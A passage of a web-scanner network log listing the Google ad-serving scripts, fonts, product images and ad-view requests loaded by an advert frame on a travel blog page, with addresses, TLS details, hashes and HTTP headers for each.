alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 882
x-xss-protection: 0
server: cafe
etag: 11243716317595354070
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 01:28:39 GMT

GET
H2 200 abg_lite_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/ Frame 586B 17 KB
7 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/abg_lite_fy2019.js

Requested by

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

b4e10c54a966ed5abeeac2aca4cfa968f317497770f59ec94af6d712db96e7d8

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:02:33 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 513
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 7115
x-xss-protection: 0
server: cafe
etag: 8094203328658613728
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 03:02:33 GMT

GET
H3-Q050 200 window_focus_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame 586B 2 KB
1 KB 8ms
7ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/window_focus_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

731d7bd9ce2c95bf6af3d5719b995d714111949fb37b39919d45828875361233

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:01:36 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 570
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 1303
x-xss-protection: 0
server: cafe
etag: 14729628269804859526
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 03:01:36 GMT

GET
H3-Q050 200 rx_lidar.js Show response
www.googletagservices.com/activeview/js/current/ Frame 586B 118 KB
36 KB 14ms
13ms Script
text/javascript 2a00:1450:4001:813::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:813::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

8727cf8bd32a94a8d93d7c75469184dada14c6cadf02178c17db5ee06f832b0f

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:06 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: sffe
etag: "1617218245166195"
vary: Accept-Encoding
content-type: text/javascript
cache-control: private, max-age=3000
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 36656
x-xss-protection: 0
expires: Fri, 02 Apr 2021 03:11:06 GMT

GET
H2 200 qs_click_protection_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame 586B 13 KB
6 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/qs_click_protection_fy2019.js

Requested by

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

c9581d69ef8a7435f061d76045cc929310f436366f9ced3b9b9811ca6ed26feb

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 01:43:25 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 5261
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 5599
x-xss-protection: 0
server: cafe
etag: 2241650964481140939
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 01:43:25 GMT

GET
H2 200 0d74ed574692e0488c8a49b73918ea59.js Show response
www.gstatic.com/mysidia/ Frame 586B 25 KB
10 KB 7ms
6ms Script
text/javascript 2a00:1450:4001:810::2003
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.gstatic.com/mysidia/0d74ed574692e0488c8a49b73918ea59.js?tag=mysidia_one_click_handler_one_afma_2019

Requested by

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:810::2003 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

11909c0ebcd1e1258ecf3c2ef83688b057b08e5d92a9c715f4fe44c13f20f7b4

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 07:08:00 GMT
content-encoding: gzip
x-content-type-options: nosniff
last-modified: Thu, 25 Mar 2021 05:14:52 GMT
server: sffe
age: 72186
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=7776000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 10398
x-xss-protection: 0
expires: Wed, 30 Jun 2021 07:08:00 GMT

GET
H2 200 shopping
encrypted-tbn2.gstatic.com/ Frame 586B 37 KB
38 KB 37ms
16ms Image
image/jpeg 2a00:1450:4001:811::200e
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://encrypted-tbn2.gstatic.com/shopping?q=tbn:ANd9GcTvWHdmRz8KRZkHHudQ15qpyFjmb29Ubt9JdEE5pOutPS6YxFcUTxB3BAu26XU&usqp=CAI

Requested by

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:811::200e Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

bbac2c9706edc8144ef4fff5e3ea355f21b4c7d633b9983e2e07bd5356ca7691

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 09:39:38 GMT
x-content-type-options: nosniff
last-modified: Wed, 05 Jun 2019 07:27:47 GMT
server: sffe
age: 63088
content-type: image/jpeg
cache-control: public, max-age=31536000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 38357
x-xss-protection: 0
expires: Fri, 01 Apr 2022 09:39:38 GMT

GET
H2 200 shopping
encrypted-tbn2.gstatic.com/ Frame 586B 37 KB
37 KB 28ms
8ms Image
image/jpeg 2a00:1450:4001:811::200e
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://encrypted-tbn2.gstatic.com/shopping?q=tbn:ANd9GcTqIADrhxaGNh2PiK4IXEOQWYdkS5Pp1sLZOgUiaQOoMOSHNfPkGkaZ74eRGbs&usqp=CAI

Requested by

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:811::200e Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

6633c03437e27f38de3853f28033bb5f8924854d37e96037fa14541723aeadc5

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Wed, 31 Mar 2021 10:24:00 GMT
x-content-type-options: nosniff
last-modified: Fri, 18 Jan 2019 10:45:11 GMT
server: sffe
age: 146826
content-type: image/jpeg
cache-control: public, max-age=31536000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 37882
x-xss-protection: 0
expires: Thu, 31 Mar 2022 10:24:00 GMT

GET
H2 200 shopping
encrypted-tbn0.gstatic.com/ Frame 586B 27 KB
27 KB 28ms
7ms Image
image/jpeg 2a00:1450:4001:802::200e
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://encrypted-tbn0.gstatic.com/shopping?q=tbn:ANd9GcSbjzKPcS4NXZt9b8EDr7eamhsn20gW1xY61dk_4_bSaGctyEBLntJDnCrz_Rk&usqp=CAI

Requested by

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:802::200e Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

993f6e06ba67f186238eae3752cacabf062fa912e3671c7b986bcb7dbfc41a64

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Wed, 31 Mar 2021 05:15:58 GMT
x-content-type-options: nosniff
last-modified: Wed, 05 Jun 2019 07:02:58 GMT
server: sffe
age: 165308
content-type: image/jpeg
cache-control: public, max-age=31536000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 27492
x-xss-protection: 0
expires: Thu, 31 Mar 2022 05:15:58 GMT

GET
H2 200 shopping
encrypted-tbn0.gstatic.com/ Frame 586B 32 KB
32 KB 48ms
27ms Image
image/jpeg 2a00:1450:4001:802::200e
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://encrypted-tbn0.gstatic.com/shopping?q=tbn:ANd9GcQ8-xDauvX2yo5Y3dKUlwBEijohd1pQ9_Dktb5w6eL3m5CMld45bFYiNqutug&usqp=CAI

Requested by

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:802::200e Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

f816aec24371b1dff69a706752566e5a47893b21c6c4b1c04f8599f9a3c7a03c

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:06 GMT
x-content-type-options: nosniff
last-modified: Wed, 05 Jun 2019 07:26:15 GMT
server: sffe
content-type: image/jpeg
cache-control: public, max-age=31536000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 32540
x-xss-protection: 0
expires: Sat, 02 Apr 2022 03:11:06 GMT

GET
H2 200 shopping
encrypted-tbn2.gstatic.com/ Frame 586B 9 KB
10 KB 26ms
6ms Image
image/png 2a00:1450:4001:811::200e
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://encrypted-tbn2.gstatic.com/shopping?q=tbn:ANd9GcSIg7_f027QRjWq377oyCrEKXy0ni9ImjiD3QMRM7ARs_t3jZ9z&usqp=CAI

Requested by

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:811::200e Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

919a63208ec97106af1969582bca0ba310c78a23eac403680a68e65eb986f3c0

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 14:37:47 GMT
x-content-type-options: nosniff
last-modified: Tue, 08 Oct 2019 09:19:57 GMT
server: sffe
age: 45199
content-type: image/png
cache-control: public, max-age=31536000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 9557
x-xss-protection: 0
expires: Fri, 01 Apr 2022 14:37:47 GMT

GET
H3-Q050 200 adview
googleads.g.doubleclick.net/pagead/ Frame 586B 0
0 18ms
17ms Fetch
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/adview?ai=CaFItSYtmYJW-PLag7_UP_u2h-AuM5ZaiYY66lo67CpiIz5mEGBABIMXPnxNglYq4gsgHoAGsg_XRA8gBCakCw0lt2CvPsT6oAwHIA8sEqgSVAk_QVtFFA3koKVfE_RQzcHFKszIQStP1aXcRW_DjuXL8qdhyPTNdVIcOZIId5KjqpSfD-jzkpmakHrpGd8AYvzUsy94Bz9n5q5AwSGPfYK2GppoPbq-nnen55_4t2Unho1bPL5IE23yCXWdPZ6umm5U-Su8AFaib9roVdfVLSgu-IrStqy-BAEkUrLLTZ2qAtsAh1KSu8PXTZZhgxSmm80GRf_E2zneE_1DJwcGeJtvZVdjVQIrR931itblilMI4TgkwNBphmw1SIhsCcbPjz4cIVGzFEJ17lZJ2E2bNAg8Xc0IlrA5R0YZjmUcn3KY_FDAVM8mF9Zu5uMI4alKCUImPYg95uCjUTIrnVMUJSaTifLcfC4bABIvfxv6pApIFBAgEGAGSBQQIBRgEkgUECAUYGJIFBQgFGKgBoAYugAeblKGRAagH8NkbqAfy2RuoB47OG6gHk9gbqAe6BqgH7paxAqgHpr4bqAfs1RvYBwDyBwQQooke0ggJCIDhgBAQARgfgAoByAsB2BMOshcaChgIABIUcHViLTY3NjE2MTE4ODAzNTEwNTM&sigh=1WhPqyieYxg&template_id=494&tpd=AGWhJmts-noUkwGGnfInHwcXJMnaq-7Htr251XNu_8yobaaRSw

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

Security Headers

Name	Value
Content-Security-Policy	script-src 'none'; object-src 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=187&slotname=1101473462&adk=1534294233&adf=336954501&pi=t.ma~as.1101473462&w=745&fwrn=4&lmt=1617333065&rafmt=11&psa=0&format=745x187&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&wgl=1&dt=1617333065802&bpp=2&bdt=301&idt=166&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&rplot=4&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=285&ady=2239&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=3&uci=a!3&btvi=2&fsb=1&xpc=ggk2H5poe9&p=https%3A//www.itravelrox.com&dtd=169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
date: Fri, 02 Apr 2021 03:11:06 GMT
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
cache-control: private
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0
expires: Fri, 02 Apr 2021 03:11:06 GMT

GET
DATA 200
OK truncated
/ Frame 586B 213 B
0 Image
image/png

General

Check archive.org

Show headers Download Go to Show image

Full URL: data:truncated
Protocol: DATA
Server: -, , ASN (),
Reverse DNS
Software: /
Resource Hash: 598e0c0e3d86fb9322fa6d8f2840fdefe4866748e6187bf217a817c8a7eb2700

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

Content-Type: image/png

GET
H2 200 ea8FacM9Wef3EJPWRrHjgE4B6CnlZxHVDv79oQ.woff2
fonts.gstatic.com/s/googlesansdisplay/v14/ Frame 586B 20 KB
21 KB 6ms
6ms Font
font/woff2 2a00:1450:4001:80f::2003
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://fonts.gstatic.com/s/googlesansdisplay/v14/ea8FacM9Wef3EJPWRrHjgE4B6CnlZxHVDv79oQ.woff2

Requested by

Host: fonts.googleapis.com
URL: https://fonts.googleapis.com/css?family=Google%20Sans%20Display%3A400

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:80f::2003 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

475700259e64d480d1a70023e14741bb298a025e338bb608552e2472d4505a65

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Origin: https://googleads.g.doubleclick.net
Referer: https://fonts.googleapis.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 19:41:26 GMT
x-content-type-options: nosniff
last-modified: Wed, 04 Dec 2019 18:44:32 GMT
server: sffe
age: 26980
content-type: font/woff2
access-control-allow-origin: *
cache-control: public, max-age=31536000
accept-ranges: bytes
timing-allow-origin: *
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 20900
x-xss-protection: 0
expires: Fri, 01 Apr 2022 19:41:26 GMT

GET
H3-Q050 200 71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js Show response
pagead2.googlesyndication.com/bg/ Frame B8A0 14 KB
6 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://pagead2.googlesyndication.com/bg/71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

ef586bf784948e62385ac9952a5ff1485f8b794c6b29328b71b67038ba26bc4f

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 09:59:54 GMT
content-encoding: br
x-content-type-options: nosniff
last-modified: Wed, 24 Mar 2021 17:18:00 GMT
server: sffe
age: 61872
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=31536000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 5693
x-xss-protection: 0
expires: Fri, 01 Apr 2022 09:59:54 GMT

GET
H3-Q050 200 css
fonts.googleapis.com/ Frame 28C6 3 KB
600 B 14ms
14ms Stylesheet
text/css 2a00:1450:4001:828::200a
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://fonts.googleapis.com/css?family=Google%20Sans%3A400%2C500

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=1661042523&adk=605609668&adf=2080630801&pi=t.ma~as.1661042523&w=1200&fwrn=4&fwrnh=100&lmt=1617333065&rafmt=1&to=pso&psa=0&channel=WordPressSinglePost%2Bpso-lv-5&format=1200x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065804&bpp=1&bdt=303&idt=171&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0%2C825x280%2C745x187&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=200&ady=86&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=4&uci=a!4&fsb=1&xpc=Grt5bJypV6&p=https%3A//www.itravelrox.com&dtd=174

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::200a Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

ESF /

Resource Hash

599325d39743959cdacb163b742dd6f622443a73f155364bbcc465a291ce0b5a

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
content-encoding: gzip
x-content-type-options: nosniff
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
x-xss-protection: 0
last-modified: Fri, 02 Apr 2021 01:21:41 GMT
server: ESF
date: Fri, 02 Apr 2021 03:11:06 GMT
x-frame-options: SAMEORIGIN
content-type: text/css; charset=utf-8
access-control-allow-origin: *
cache-control: private, max-age=86400, stale-while-revalidate=604800
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
expires: Fri, 02 Apr 2021 03:11:06 GMT

GET
H3-Q050 200 load_preloaded_resource_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame 28C6 1 KB
910 B 6ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/load_preloaded_resource_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

49aea8d1206dbb5e3c8a7d4db9274d2efa2111d8b53acb901efc378b1feca381

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 01:28:39 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 6147
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 882
x-xss-protection: 0
server: cafe
etag: 11243716317595354070
vary: Accept-Encoding, Origin
